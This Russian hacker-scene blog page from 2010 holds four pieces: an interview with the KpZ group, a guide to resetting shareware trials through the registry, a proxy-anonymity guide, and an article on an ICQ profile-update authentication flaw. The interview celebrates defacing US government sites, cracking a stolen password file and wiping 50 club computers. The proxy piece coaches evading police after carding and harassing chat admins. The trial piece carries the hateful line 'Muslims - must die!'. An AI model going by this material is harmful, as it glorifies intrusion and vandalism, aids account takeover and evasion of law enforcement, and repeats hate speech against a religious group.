ХАЙ-ТЕК

30.01.2010 21:31

Хакерская группа KpZ - изнутри

Чтобы ввести вас в курс дела, для начала хотелось бы кратко рассказать вам о развитии хакерского движения в России. Началось все практически с того времени, когда в нашей стране для простого человека появилась возможность выйти во всемирную паутину. За считанное время Интернет охватил все регионы России и принял глобальный характер. В нашей стране международная всемирная сеть была в то время еще новинкой, несмотря на то, что с каждым днем к ней присоединялось все больше и больше людей. О проделках так называемых хакеров можно было услышать только из-за "бугра" или увидеть в кино, но наши люди не заставили долго ждать. И вскоре в России был организован отдел по борьбе с компьютерными преступлениями, в московских газетах появились статьи о "маленьких гениях-хакерах", которые теперь отсиживают срок. На самом деле были пойманы бедные детки, студенты, которые просто хотели подзаработать немного денег через Интернет, заказывая товар на дом по фальшивим кредиткам (к реальному хакерству это ну никак нельзя было отнести). А тем временем, пока люди из Федеральной Службы Безопасности гонялись за этими "хакерами", другие спокойно себе сидели дома и получали новые знания, чувствуя себя в полной безопасности. Можно даже сказать, что хакерство в России развивалось с огромной скоростью и при этом не ощущало никаких преград со стороны органов правопорядка.

Группа, о которой пойдет речь, была образована в конце августа 1998 года. Как раз тогда, когда тысячи подростков, просмотрев дошедший до России фильм "Hackers" и начитавшись статей про хакеров, ринулись в Интернет, возомнив себя профессиональными взломщиками. И первоначальная идея группы состояла в том, чтобы показать детям, что они не правы, и всемирная паутина не место для подобного развлечения и для людей с манией величия. Был зарегистрирован сервер, который носил название "Муд$#и Русского Интернета" и который ежедневно пополнялся списком "хакерских страничек", которые через некоторое время группой же и уничтожались. Так же, если в каком-либо чате отсутствовала цензура или, опять-таки, появлялись люди и кричали "Я крутой хакер, щас я вас всех занюкаю...", и с этим не могли справиться администраторы серверов, чат по "неизвестным никому причинам" выходил из строя. За месяц, поняв, что молодежь не остановить, что они все равно будут продолжать "нюкать" и забивать почту пользователям, KpZ-шники решили оставить их в покое и заняться чем-нибудь поважнее.

Первоначально в KpZ было около 10 человек, но месяц спустя из-за отсутствия знаний большинство было "уволено". Осталось 5 человек:

Tarantino: художник, programmer

Delta: Языки: VB, DELPHI, C++

OS: UNIX, NT

MAL: Языки: VB, BASIC, C , C++, ASM, DELPHI....

OS: winNT/98, UNIX

v00d00: Языки: BASIC, VB, C++, ASM, PASCAL, DELPHI, Perl

OS: Windows, Linux

В дальнейшем были приняты еще два человека:

Spider: Языки: VB, С++, JAVA , PERL, немного ASM....

OS: Unix, NT

Mishgan: Языки: Basic, cgi scripts

OS: WinNT

Название группы фактически не несет никакого определенного смысла и расшифровывается, как Камера Предварительного Заключения.

Итак, началось все с того, что администрация известного московского компьютерного клуба "Орки" нанесла некоторый моральный ущерб одному из KpZ. Расплата последовала немедленно, и некоторое время на их серверах можно было видеть уникальное оформление в стиле KpZ, но это был не конец, а чтобы описать все, что с ними случилось, нужно начинать новую статью.

Некоторые последующие взломы имели заказной характер и были успешно выполнены на все сто процентов.

Больше в Российском Интернете ничего привлекательного для KpZ не осталось, и им пришлось двинуться дальше и перейти на международные правительственные и военные сети. С этим и пришло мировое признание и известность. Вот выдержка из новостей Биккеля (судите сами):

U.S. Government/Military: *ouch*

The Russian hacking formation KpZ and the Romanian group Pentaguard are trying to start a brand new Cold War, with succes we might add. A hacker called Windows95 (what's in a name) of KpZ and Diablo of Pentaguard compromised 21 U.S. Government and Military Web sites. They replaced all the mainpages of the sites with the same hacked version. And if that's not enough, both hackers defaced a Chinese government server aswell.

Both hacking groups claimed responsiblity for the attack on 2 U.S. servers this past weekend. We didn't know who did it, but as it turns out now both groups are working together.

Hacked sites:

sisyphus.larc.nasa.gov wwwjtuav.redstone.army.mil

nces.ed.gov

cfo.gsa.gov

www-ese.fnal.gov

dcaucusweb.house.gov

naisteam.msfc.nasa.gov

www.dlis.dla.mil/default.htm

ohrm.niddk.nih.gov

bulltrout.nwifc.wa.gov

www.fmc.gov/default.htm

wwwjtuav.redstone.army.mil

ri-acala4.ria.army.mil

www.237arf.1ad.army.mil

www.odcsrm.hqusareur.army.mil

pcjcm1.ece.nps.navy.mil

www.237arf.1ad.army.mil

afas.afpc.randolph.af.mil/index.htm

Some hacks

Last week many Web sites got compromised by numerous hacking groups/individuals. We won't mention them all but there are some notable hacks. This weekend a NASA Web site got their mainpage replaced by the Russian hacking group KpZ or a group called Pentaguard. Indeed, we're not sure since both groups claim responsibility for the attack. According to the rumours a military Web site got hacked aswell by Pentaguard. Again we're not sure since both sites are restored to their original content.

shook-pc.jpl.nasa.gov

www.266fc.hqusareur.army.mil

Ну и это, естественно, далеко не все, что было взломано группой KpZ. В настоящее время, из-за большого интереса к группе определенных отделов безопасности некоторые люди, к сожалению, покинули группу и занимаются "сольной, самостоятельной деятельностью".

Состав KpZ на сегодня: MAL, Mishgan, v00d00.

Этим, оставшимся в группе людям, мы и задали несколько вопросов.

X: С чего вдруг все началось? Что, сидели, пиво пили и вдруг подумали: "А не стать ли нам крутой хацкерской группой"?

Mishgan: Ну, началось, мне кажется, у каждого из нас все постепенно. Сначала научились пользоваться нюком, потом начали тщательно изучать различные операционки, так, постепенно развиваясь, мы стали такими, какие есть на данный момент. Потом, поняв, что выбрасывание людей из чатов и занятия подобного рода слишком надоели и стали вовсе не интересными, мы решили

собрать группу, которая будет заниматься взломами удаленных компьютеров в сети Интернет.

Ну и пошло поехало... :-)

MAL: Ну, в принципе, да. Но это так, образно, а если точнее, то помню, сидел я в сети, и шлет мне знакомый по ICQ файло какое-то в текстовом формате, а

далее сообщение такого приблизительно содержания: "Организовывается группа по борьбе с недоразвитыми админами и позорными сайтами. Для вступления заполните анкету и отошлите обратно мне." Так было набрано около 10-15 человек, половина из которых в последующее время была отсеяна. Вот таким образом и была образована группа.

X: А чем вы занимаетесь в обычной жизни?

Mishgan: Я учусь в средней школе, в 10 классе. Мне 15 лет. Можно сказать, что я - хорошист. :) Учусь на 3-4. Кстати, в нашей школе даже нет предмета «информатика». Вот такая вот школа... :)

Приходиться все познавать самому: читать много книг на любые компьютерные темы, экспериментировать и делать многое другое без какой-либо помощи окружающих. В недалеком будущем собираюсь пойти работать в техподдержку к какому-нибудь провайдеру.

MAL: В обычной жизни? Да пока ничем... Но, естественно, моя будущая работа, специальность будет связана с Интернетом. Иначе и быть не может. :)

X: Для чего вам все это нужно?

Mishgan: Я считаю, нужно все это прежде всего для глубоких знаний. А знания всегда нужны... Например, если ты супер хацкер, знаешь множество языков программирования, много операционных систем и другие различные примочки, то тебя любая компьютерная фирма с руками оторвет и будут платить нехилые деньги. А еще я просто-напросто получаю удовольствие от хакинга, веселюсь (есть в этом деле и веселые моменты) и многое другое. Следовательно, все это мне нужно для будущей профессии, развлечений , все это нужно мне прежде всего для себя.

MAL: Я этим занимаюсь потому что мне это нравится. Я повышаю свои умственные способности, то есть я стремлюсь к самосовершенствованию. В какой-то степени хакерство можно использовать и в качестве заработка, мести, разборки, но никакими деньгами не купишь того морального удовлетворения, которое получаешь при взломе очередного сервера.

X: Какие там на самом деле отношения с группой Pentaguard?

Mishgan: Все началось с того, что поздней ночью я решил поломать парочку серваков и тут наткнулся на сервер с дырявым FronPage-ом и от нечего делать решил поиздеваться над ним... Заменил главную страницу своей, где оставил свое мыло, как говорится, для сожалений и мата. :) Вдруг через 15-20 минут мне приходит письмо следующего содержания (на английском): «Ты кретин! Ты не представляешь себе, что ты натворил...» и т.д. и т.п. Это оказался сайт румынской хакерской группы «Пентагуард». :) В ответ на свое письмо он получил послание на три широко известные веселые буквы... Ну, а потом разговорились мы с ним, рассказали о себе. Ну и было время, что мы с Diablo (Member of Pentuguard) нахацкали кучу военных хостов. Но, к сожалению, он в скором времени исчез из Инета, и больше я его не видел. На этом и закончились какие-либо отношения с этой группой. А шуму-то в прессе было!

MAL: Ну да, так и было. А у меня лично никаких отношений с этой группой нет. Mishgan контактировал с лидером этой группы, и они просто договорились в оно время заменить одинаковые индексы на военных серверах, как бы для придачи этому процессу глобального характера. Поэтому пошли слухи, что мы работаем вместе. А так мы ни с кем не сотрудничаем.

X: А были какие-нибудь прикольные случаи в хакерской жизни?

Mishgan: Вообще-то случаев было огромное количество, только вот в голову ничего не лезет, ну не помню, хоть застрелись... Мне очень понравился случай, как одни мои знакомые завалили провайдера. Ну, значит, зарутили его, но цель была другой... Было послано письмо админу, типа давай мы тебе говорим дырку в твоем сайте и объясняем, как ее заткнуть, а ты дашь нам парочку акаунтов. На что последовал ответ: «А ключи от квартиры тебе не дать?». Спасибо, ответил мой знакомый. :) В этот же день можно было видеть на сайте красивую страничку с названием «Hacked» :) А всего-то надо было поделиться Инетом... Но админ сделал свой выбор... Кроме того, на сайте не осталось ничего, кроме этой странички... Как говорится, «жадность фраера сгубила». :)

MAL: Прикольный случай? Ну, знаешь, сейчас в Интернете большое количество музыкальных групп открывают свои странички. И, естественно, есть те музыканты, которые нас бесят. Ну вот в честь этого со страницы одной из попсовых групп была стерта доска объявлений (webboard). Причем никаких особых знаний для этого не потребовалось, стоило только набрать в броузере строку www.******.ru/webboard/passwd.txt и, получив пароль в DES, расшифровать с помощью всем известного Johna. Итак, все сообщения были уничтожены. И через неделю происходит следующая ситуация. Сидит один из КпЗ дома, за компьютером, как вдруг вырубается свет, и в тот же момент слышен стук в дверь.

- Кто там?

- Милиция! Откройте.

- А по какому поводу?

- По компьютерному.

Проникнув в квартиру, наша доблестная милиция схватила компьютер

и потащила его в машину вместе с парнем. Почитав в отделении хистори

из ICQ и не поняв, про что это он разговаривал со своими друзьями,

употребляя такие загадочные слова, как linux, irix и т.д., а также

для чего у него на компьютере какие-то непонятные программки,

помучав человека тупыми допросами, в которых в общем-то

они даже и не знали, что спрашивать, им пришлось отпустить КпЗ

на волю! :)

Случай второй. Компьютерный салон ОРКИ, что когда-то существовал на

Октябрьской. Опозорив их на весь Интернет заменой страницы на их сервере, это почему-то показалось нам слишком легким наказанием. Поэтому в этот вечер мы были там, в их логове. 5 минут хватило чтобы расшифровать пароль от своего компьютера, с помощью которого можно было бы управлять машиной удаленно. Как оказалось, на всех компах был один и тот же пароль. Ну тут-то все и началось. Я быстренько залазил со своей машины на другие и все под чистую стирал. Другой человек, сидящий рядом, с ускоренным темпом на другие компы кидал autoexec.bat, который в дальнейшем, при перезагрузке, также удалял все подчистую. Из 80 машин мы только успели стереть все с 50, пока админы ни поняли, что что-то не так. В ярости и с глазами как у слона, они (админы) выбежали в центр клуба и во весь голос начали орать чтоб никто ни в коем случае не перезагружал машины, и доступ в Интернет был резко прикрыт. Немного посмеявшись, я подозвал проходившего мимо администратора и спросил, сделав ужасно удивленное лицо: «Что случилось? Что, опять хакеры? Кто это?», на что он ответил очень серьезным голосом: «Я не знаю, кто это! Но это они! ХАКЕРЫ!».

X: Ребята, а чем вы занимаетесь в свободное время (вне компьютеров)? Тусуетесь где-нибудь?

Mishgan: Мемберы в обычной жизни занимаются тем же, что и другие обычные люди. Не надо думать, что хакеры - это прыщавые студенты в очках, забытые Богом и думающие только о компах и о том, что с ними связано. Хакеры - это абсолютно такие же люди, как и все, которые постоянно веселятся, ходят на дискотеки, пьют пиво (и не только), гуляют с девушками... То есть развлекаются по полной программе, как и все остальные люди. А компьютер и хакерство - очень увлекательное хобби. Ведь получаешь такое удовольствие, когда натягиваешь сервак какой-нибудь музыкальной группы, которую больше всего ненавидишь, и когда напишешь на главной странице все, что о ней думаешь. :) Ну, мы в обычной жизни развлекаемся, как только можем. Чем обычно занимается молодежь, тем мы и занимаемся .

MAL: Мое любимое времяпрепровождение без компов - бар, дискотека,

много пива, девушки. Ну вот, в общем-то, и все. :)

X: Что объединяет группу? Вы все друзья или просто «коллеги»?

Mishgan: Я считаю, что прежде всего нашу группу объединяют общие интересы, все мы хотим познать как можно больше, мы все трудимся в одном направлении, да и в группе работать легче и веселее, чем заниматься вольной самодеятельностью... Друзья мы или «коллеги»? Я думаю, что мы в какой-то степени друзья, но в большей части коллеги...

MAL: На самом деле поначалу мы были просто «коллегами по цеху», но потом все это переросло в дружбу, так как нам приходилось общаться чуть ли ни круглые сутки, и часто разговоры о сетях переходили в обсуждения личной жизни и т.д. и т.п. Поэтому можно сказать, что группу объединяет дружба и сплоченность коллектива.

X: Что конкретно делает группа? Только ломает серверы, заменяя index.htm?

Mishgan: Наша группа специализируется на хакинге ,то есть на взломе (получении несанкционированного доступа) удаленных систем, что стоит очень больших усилий и долгой работы. Мы заменяем на сервере заглавную страницу (index.htm или default.htm), если из сервера нельзя вытянуть никакой полезной информации. Он становится не нужен, и тогда мы меняем заглавную страницу. Ну а если же сервер полон полезной информации, то мы не делаем этого никогда! Наоборот, все делаем очень осторожно, следим за каждым шагом, внимательно чистя за собой логи.

MAL: Замена индекса делается только для того, чтобы системные администраторы знали, что у них слабая защита, и предприняли какие-либо действия. А если говорить о чем-то конкретном, то я просто пытаюсь получить как можно больше информации об операционных системах, языках программирования, каких-то новых технологий. И, естественно, изучая ОС, нельзя не попробовать найденные тобой же баги на разных серверах.

X: Как вы думаете, что у вас будет в будущем? Побалуетесь, побалуетесь, а потом «жена, дети» и т.д.?

Mishgan: Я думаю, что у КпЗ должно быть будущее (по идее). Хотя, вполне возможно, что КпЗ полностью распадется со временем, так как когда человеку исполняется 30 или около 30 лет, его начинают заботить другие проблемы - семья, дети и т.д. Очень часто это случается и раньше. Надо надеяться на лучшее, надо всегда оставаться дружным коллективом, и только тогда у группы может возникнуть большое, продолжительное будущее... Вскоре мы собираемся выйти из подполья и организовать что-то вроде «Lopht» или «Genocide2600».

MAL: Ну а пока все еще нужно учиться, учиться и учиться. А потом даже не знаю. Вообще я собираюсь открыть КпЗ-lab, аналог LOphT или Genocide2600. Естественно, придется выйти из underground и заниматься всем уже легально, не опасаясь за свою свободу.

Открыть больше изображений

30.01.2010 18:16

Бедность не порок, а способ шевелить мозгами...

Те, кто лазит по Интернету, наверняка натыкались на целые залежи очень полезных прог, но все они как, правило, либо шароварные (т.е. за них надо платить зеленые бабки, чтобы прислали код), либо с ограниченным временем действия. Таких программулек накапливается куча, и обходиться без них как-то не хочется, привыкаешь как к помойному ведру. Я бы с удовольствием платил бы за них, но так как постоянная статья дохода, стипендия, составляет всего 4$ USA (да и ту еще не дадут вовремя), приходится крепко думать, как потратить эти «бешеные деньги» и шевелить мозгами в другом направлении.

Очень многие программки с ограниченным временем действия (или по-русски trial'ы) после деинсталляции и повторной установки все равно отказываются работать. (Про)двинутый Чайник сообразит, что прога где-то оставила свой хвост и, натыкаясь на него, отказывается работать. Что делать?

Продвинутый хакер сразу кинется исследовать прогу, чтоб взломать ее и изменить код, отвечающий за проверку времени действия. А что делать Чайнику? Сидеть и ждать, когда другие взломают, и потом долго лазить по хакерским сайтам в надежде найти код или пароль для любимой программки? Ни в коем случае! Лучше попытаемся сделать это все своими шаловливыми ручками.

Немного теории и умозаключений. Где может прятаться хвост? Мест не так уж и много:

1. cистемный регистр (если у тебя, конечно, стоит Windows95/98 или NT);

2. файл win.ini (системный файл - анахронизм (пережиток, родные вы мои), тянущийся со времен Windows3.1) ;

3. создается программой собственный хитрый файл в каталоге Windows, в котором регистрируются все изменения (обычно создается при первом запуске установленной программы).

Ну а теперь чем и как все это отловить?

Сразу выражу благодарность стойкому борцу с хакерами всех мастей журналу GAME.EXE (под предводительством бравого казачьего атамана Михайло Новикова) за то, что на CD диске к журналу №2 за 1999 год в разделе «полезные утилиты» выложил очень полезную утилиту Regmon95 (Regmon for Windows NT/9x Mark Russinovich and Bryce Cogswell http://www.sysinternals.com). Кстати, с сайта www.sysinternals.com скачайте еще одну полезняшку (как говорит Евгений Козловский - кто не знает: www.computerra.ru ) по имени Filemon (Filemon for Windows NT/9x Mark Russinovich and Bryce Cogswell www.sysinternals.com). Кратенько опишу, что это такое.

Как понял из названия, Regmon for Windows NT/9x это ни что иное, как монитор регистра, который отслеживает все обращения к регистру любыми программами и ведет запись всех обращений, а Filemon - фиксирует все обращения программ к файлам (гениально!). Мощные инструменты для ловли нежелательных связей.

А теперь испробуем на примере эту комбинацию из трех пальцев (пардон, программ). У меня есть любимая программка NETmon v.2.0 для контроля скорости соединения с Интернетом (даже и не вспомню, откуда ее выловил, если приспичит, то попробуй глянуть на каком-нибудь www.download.ru), но вот беда - через 10 дней после установки она (программа) прекращает работать.

Делаю раз. Запускаю Regmon.

Делаю два. Запускаю Filemon.

Делаю три. Запускаю NETmon.

Смотрю, и волосы дыбом. В окнах Regmon'а и Filemon'a тьма всяких записей. Если чуток напрячься, то вполне можно найти знакомое название «netmon» и в опциях программ, в разделе «фильтр», поставить netmon. Закрываю все и открываю заново. Вот теперь порядок, зафиксированы записи, относящиеся только к нужной программе. Ну а теперь ну очень тщательный (скрупулезный, для умных) анализ полученной информации.

В Filemon что-то ничего в глаза не бросилось. Банальное обращение проги к своему ехе'шному файлу и dll'елке.

(вставить картинку trial2.jpg подпись: «В Filemon отсутствует любая информация к размышлению. Даже для полковника Исаева»)

В Regmon'е уже интересней. Сразу замечается наглое обращение программы к одному и тому же ключу регистра.

(вставить картинку trial1.jpg подпись: «Remon с отловленным ключом реестра»)

Два раза щелкаю по выбранной записи в регмониторе, и открывается виндовсный Regedit, откуда с чистой совестью удаляется треклятый ключ. (Прежде чем лезть в системный реестр - сделай резервную копию файлов реестра (systm.dat и user.dat из корневого директория Виндов), чтобы не пришлось рвать волосы на одном месте и переустанавливать систему).

Ну а теперь осталось только посмотреть на конечный результат. Запускаю NETmon - все в порядке, фокус удался, факир оказался трезв, что в общем-то странно, учитывая специфику «тонкой» работы с реестром. Все. Фанфары и поздравления. Низкие поклоны и широкий занавес. Концерт закончен. А по традиции, следуя классическим библейским традициям (Muslims - must die!), вручаю удочку - рыбу при наличии извилистых мозгов и прямых (обязательно!) рук поручаю ловить тебе самому... Хорошего клева!

Открыть больше изображений

30.01.2010 13:12

прокси ваша анонимность

Если ты помнишь недавнюю историю с неким "хакером", который получил 5 лет условно, то наверно знаешь, каким образом он попался. Этот самый "хакер" занимался кардингом (читай Х №1), и все было бы хорошо, но это чудо в перьях даже не позаботилось о своей безопасности, наивно полагая, что, используя Proxy сервер своего провайдера, он обезопасит себя от всех спецслужб. Общеизвестен тот ФАКт, что любой PROXY сервер ведет логи всех действий, совершаемых пользователем. И если вдруг у спецслужб возникнут подозрения на то, что ты совершал неправомерные действия (ну и формулировочки у них!), то они имеют право запросить у провайдера всю информацию о тебе и твоих перемещениях в Сети. Вот тут-то тебя и схватят. :) И не надо думать, что ты крутой, что IP еще ничего не говорит. Все он говорит, даже твой домашний адрес. Но об этом мы расскажем как-нибудь в другой раз, а пока разберемся в этих злосчастных proxy-серверах.

Part 1. Как скрыть свой реальный IP адрес?

Все прокси серверы делятся на две большие группы, это transparent (прозрачные) и no transparent (не прозрачные).

Если ты используешь Transparent сервер, то не надейся на то, что твой реальный IP адрес никто не раскроет! При запросе такой Proxy cервер выдаст всю необходимую информацию о тебе. И считай, что твоя любимая девушка из чата уже знает, что на самом деле ты - некрофил из Южной Африки. А вот при использования no transparent PROXY твой реальный IP адрес врагу узнать не удастся! И он будет наивно полагать, что ты находишься черт знает где, то есть будет видеть лишь физическое положение самого Proxy сервера, но не тебя.

Если ты не уверен в том, что тебя может спасти один анонимный прокси сервер, то можешь использовать последовательность проксей: http://www.pentagon.gov/" target="_top">http://proxy2:port/http://www.pentagon.gov/" target="_top">http://proxy1:port/http://www.pentagon.gov/" target="_top">http://proxy2:port/http://www.pentagon.gov/ (учти, что не все прокси могут работать таким образом). В этом случае ты связываешься с нужным хостом, проходя через целую цепочку проки серверов. И если все они no transparent, то отследить тебя будет практически невозможно. Очень удобно для чатов и досок объявлений. :)

В случае с чатом твоя легенда будет зависит от выбранного Proxy сервера. А то часто зайдет какой-нибудь крендель с финским IP-шником и начинает рассказывать, как у него тут жарко, да еще к тому же и носороги по улицам ходить мешают и в море акул немеренно. Все в недоумении. Но знающие люди сразу просекают, что этот баклан через прокси залез. Вобщем, сам себя сдал. :)

Part 2. Как ускорить получение информации в Интернет

На PROXY серверах хранится большое количество динамически изменяющейся информации с серверов Интернет - это страницы, графика, файлы и т.п. Если ты зашел через прокси, залез на сайт с порнухой, насмотрелся картинок, а после тебя кто-нибудь другой из пользователей PROXY сервера полез на этот же сайт, то второму человеку повезло. Прокси сервер кеширует все, что через него проходит, динамически обновляя свой кеш. Следовательно, второй юзер будет тащить все картинки уже с самого прокси сервера, а не с настоящего сайта, а значит, он получит более быстрый доступ к страницам. Но на этом все прелести и возможности использования proxy серверов не кончаются ....

Part 3. Как довести до инфаркта АДМИНА чата

Прошли те времена, когда www-чат был в диковинку. Когда-то там можно было творить все что угодно! Использовать HTML теги, писать ОГРОМЕННЫМИ буквами и делать другие гадости назло всем. Но самая хорошая вещь www-чатов жива и поныне. Если тебя выкинули из чата без права повторного входа, то тут лучше всего поможет смена PROXY сервера в настройках твоего браузера. Как только ты сменил себе прокси, то сможешь заново зайти в чат и, до того как тебя оттуда опять выкинет разьяренный Админ, ты успеешь выругаться матом с применением HTML Тегов :-)

10 - 20 таких заходов, и Админ в Морге :-). Понимаю, что руками менять прокси - это не совсем удобно, но есть программки, делающие это автоматически.

Таблица 1. Proxy сервера со скрытием реального IP адресса (no transparent)

Таблица 2. Обычные Proxy сервера с с показом реального IP (transparent)

Proxy сервер

Порт

Proxy сервер

Порт

proxy.mcmail.com

8080

Cache.connect.ab.ca

3128

proxy.co.rmit.edu.au

8080

Cache.sh.cvut.cz

3128

gateway.kwantlen.bc.ca

80

Server.librarysafe.com

81

sakura.my-pharm.ac.jp

8080

Proxy.silcom.com

3128

ns1.san.rr.com

8080

Cache2.nlanr.pa-x.dec.com

3128

prefetch-atm.midsouth.rr.com

8080

Cache.vossnet.de

3128

infosun-fd.rus.uni-stuttgart.de

8080

Pluto.nienburg-weser.de

8080

proxy.co.rmit.edu.au

8080

Otsun1f.dss.dornier.dasa.de

3128

linux.softec.es

8080

dos2.esegi.es

3128

magicall2.dacom.co.kr

8080

www-cache.kolumbus.fi

8080

proxy1.jaring.my

3128

Proxy.spidernet.it

8080

sunsite.icm.edu.pl

8080

Sama.isc.kyutech.ac.jp

8080

proxy.qatar.net.qa

8080

Proxy.kren.nm.kr

8080

proxy1.turnet.net.tr

8080

Proxy.intnet.mu

8080

proxy.cybergate.co.zw

8080

chip.Austria.EU.net

8080

www-proxy.tecan.co.at

8080

proxy.knoware.nl

8000

cache-mar.belbone.be

80

proxy.lofotposten.no

80

sanan.com.br

8080

proxy.silk.org

3128

proxy.collegemv.qc.ca

8080

proxy.starnets.ro

3128

cache3.worldcom.ch

8080

proxy.salekhard.ru

3333

bbs.packardbell.com

80

hammer.overta.ru

3128

titan.datainternet.com

8080

news.ntu.edu.sg

8080

gatekeeper.ots.dk

80

yav.yacc.yakutia.su

8080

www.samford.edu

8080

instanet.edex.net.uk

3128

linux.softec.es

8080

dilbert.bb.cc.wa.us

3128

proxy.inet.fi

800

cache.new.co.za

8080

mercury.lngs.infn.it

80

cache.connect.ab.ca

3128

www.obc.ac.jp

80

proxy.spidernet.it

8080

cvs2.kyunghee.ac.kr

8080

proxy.kren.nm.kr

8080

cacheflow.cyberramp.net

8080

proxy.knoware.nl

8000

proxy.maryhurst.org

80

dos2.esegi.es

3128

alpha.cosapidata.com.pe

80

server.librarysafe.com

81

double-panic.lut.ac.uk

8080

news.ntu.edu.sg

8080

Проверить свой прокси на предмет его полной анонимности можно тут: http://www.tamos.com/bin/proxy.cgi

Если ты увидишь сообщение «Proxy server is detected!» - то это значит, что твой прокси не имеет защиты, и тебе будет предоставлена информация о твоем реальном IP адресе, как, впрочем, и об IP адресе прокси сервера, который ты используешь. Если же сообщение гласит «Proxy server is not detected» - то все в порядке!

Part 4. Как весь этот ужас настроить

В меню Edit выбери Preferences. В закладке Proxies выбери Manual Proxy Configuration и нажми на кнопку View. Проставь необходимый тебе прокси сервер и его порт (см. Таблицу).

В меню View выбери Internet Options, далее закладку Connection, в разделе Proxy Server пометь Connect using a proxy server (подключение через прокси сервер), впиши имя прокси сервера и порт.

Дополнительная информация:

http://www.bikkel.com/~proxy/public.html - Публичные Анониминайзеры.

http://www.bikkel.com/~proxy/proxy.html - БОЛЬШОЙ список всевозможных Прокси серверов.

30.01.2010 11:56

Большому кораблю - большая торпеда

Пролог

То, что Интернет просто кишит различными дырками, знает каждый. Но то, что эти дырки порой настолько огромны, что взломать какой-нибудь почтовый сервер может просто любой школьник, понимают не все. Например, уже известная дырка на сервере chat.ru. На всех серверах такого типа всегда предоставляется услуга онлайновой смены пользовательской информации. Там, как правило, вы можете сменить свои имя, фамилию, иногда, как это было в случае с www.chat.ru, - пароль. Процесс смены всегда проходит в два этапа. Сначала вы авторизуетесь, вводя свой логин и пароль. После этого вы попадаете на страничку с вашей информацией, где вы ее можете изменить. Вторым шагом вы даете команду серверу запомнить сделанные вами изменения. Только вот что удивительно! Не все считают нужным запрашивать пароль при втором шаге! Почему-то думают, что раз человек меняет инфу для этого логина, то, значит, это и есть законный пользователь. Только ведь это не факт. Раз на втором этапе проверка пароля не производится, то что мешает вручную подредактировать исходный текст странички с вашей информацией и изменить свой логин на любой чужой? Ведь все равно, когда вы даете серверу команду запомнить изменения, он не запрашивает пароль, а, стало быть, поставив вместо своего в исходном тексте чужой логин, вы заставите сервер сменить для него инфу. Так вот, какой бы глупой ни была на первый взгляд эта ошибка, она оказалась весьма распространенной. Тут-то я, собственно, и подхожу к началу своего повествования.

Программеры всех стран... ошибайтесь!

Освоив данное "отверстие" на www.chat.r, я решил попробовать применить его на сервисах других служб подобного толка. В их число попал пресловутый Mirabilis, создатель самого удобного и самого популярного Интернет-пейджера ICQ, или в простонародье - аськи. В число их услуг также входит возможность онлайновой смены через браузер информации о пользователе на сервере Мирабилиса. Назначение этой услуги мне не ясно до сих пор... Ведь меняется же вся информация совершенно превосходно и через интерфейс самой аси. Ну да не об этом разговор. Есть, значит, такой сервис: www.icq.com/whitepages/login.html. Здесь, введя свой уникальный идентификационный номер (uin) и свой пароль, вы также попадаете на страничку с собственной информацией. В исходнике данной страницы я обнаруживаю вот такой фрагмент:

http://white.mirabilis.com/scripts/update.dll" onsubmit="return(Validate())">

О чем он говорит? О том, что при нажатии кнопки "Submit" вы отдаете серверу Мирабилиса команду сменить информацию для юина 133007 и подтверждаете свое право на дачу такой команды неким кодом 0517E2A83667B05A, выданным вам сервером при вашем заходе на страничку со своей информацией. Кинув беглый взгляд на данный 16-ти байтовый код, я понял, что тут мне ничего не светит и что на Мирабилисе скорее всего сидят не дураки, и код этот генерируется как функция от юина и от пароля. Сохранив на всякий случай страничку со своей информацией на винчестере, я с осознанием выполненного долга забыл про нее. И так бы и попала она в мусорную корзину, если бы ни одно обстоятельство.

Пища кочевника

Я до сих пор не уверен, то ли это бред моего подозрительного мозга, то ли так оно и есть, но кажется мне, что ходит по компьютерам некий кочующий вирус, в функции которого входит смена пароля для всех установленных на компьютере аськиных юинов!

В один прекрасный день я обнаружил, что все три юина, установленные на моем компе, не хотят коннектиться с сервером, мотивируя свое поведение неправильностью пароля. Причем не коннектились только те аськи, которые были установлены, а парочка зарегистрированных мной для пробы и не установленных после последней переинсталляции юинов пароль не сменили. Я долго думал, что бы это могло значить. Ведь информация на всех моих юинах осталась старой, не считая того, что удалилась запись о primary e-mail, по которому в случае потери пароля завсегда можно получить его. И тут, не знаю, что мне стрельнуло в голову, я нашел сохраненную мною страничку со своей информацией, открыл ее браузером, нажал Submit. И, о чудо!!! Моя информация сменилась на нужную, т.е. также восстановилась запись о primary e-mail. Далее получить свой пароль было делом техники и 3 часов времени. Дело в том, что на Мирабилисе есть такой сервис, как высылка пароля для юина по тому мылу, которое прописано в графе primary e-mail. Пароль пришел. Запомните его: gUd-ByE! Если однажды ваша ася скажет, что у вас неправильный пароль, попробуйте его. Дело в том, что этот пароль оказался на всех трех асях и был явно установлен рукой программного робота. Но не это натолкнуло меня на мысль о вирусе-кочевнике. Дело в том, что впоследствии этот же пароль я обнаружил на юине 500000, а им-то уж точно стали бы пользоваться, однажды завладев. Но вернемся к нашим баранам :-)

Игольное ушко... и то, что через него ушло

Возвращения моих юинов вселило в меня большой оптимизм. Ведь раз я смог сменить пользовательскую информацию, не зная пароля, значит, тот самый код, который отпугнул меня в первый раз, генерировался только как функция от юина и не зависел от пароля! Исходя из принципа "что один сделал, другой завсегда разобрать сможет" я стал вычислять алгоритм генерации этого кода. Все оказалось не так просто, как я решил сначала. Если дыра на www.chat.ru была размером со вселенную, то тут она была не больше игольного ушка. Этого и стоило ожидать. Все же не зря AOL выложил за Мирабилис 365 млн. долларов. И, тем не менее, я стал ковыряться. Больно уж велик был соблазн.

Исходя из того, что идентификационный код был шестнадцатеричным, я пришел к выводу, что и юины нужно для наглядности перевести в шестнадцатеричную систему. Учитывая то, что теоретически нумерация юинов начинается с 1001 плюс еще абстрактный юин 1, принадлежащий администрации Мирабилиса, я решил, что для наглядности будет лучше, если я буду перед переводом в шестнадцатеричную систему отнимать от номера число 999. В чем-то мне это помогло. Было действительно немного наглядней. Например, для моего юина 133007 шестнадцатеричное значение составляло 0203A8, а идентификационных кодов выдавалось несколько:

0 517E2A8 366 7B 05A

1 406F3B9 365 ED C97

2 735C08A 365 ED 9C4 и т.д.

